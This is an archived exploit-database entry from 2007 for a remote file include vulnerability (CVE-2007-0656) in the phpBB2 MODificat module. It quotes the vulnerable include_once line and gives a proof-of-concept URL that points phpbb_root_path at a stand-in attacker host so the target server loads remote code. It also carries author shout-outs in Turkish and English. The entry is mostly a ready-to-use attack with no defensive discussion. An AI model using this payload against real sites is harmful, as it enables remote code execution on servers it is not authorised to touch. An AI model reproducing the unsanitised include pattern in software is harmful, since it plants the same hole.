phpBB2 MODificat <= 0.2.0 functions.php Remote Include Vulnerability

2007-01-30T00:00:00
ID EDB-ID:3231
Type exploitdb
Reporter Mehmet Ince
Modified 2007-01-30T00:00:00

Description

phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include Vulnerability. CVE-2007-0656. Webapps exploit for php platform

                                        
                                            -----------------------------------------------

phpBB2 MODificat (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:
include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );
-----------------------------------------------

POC:

www.[target].com/[script_pat]/includes/functions.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=110366

-----------------------------------------------

Tesekkurler: pang0, chaos, can bjorn

Thanx: str0ke, kacper

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir cocuk xoron.

Adimizi altin harflerle yazdik.

-----------------------------------------------

# milw0rm.com [2007-01-30]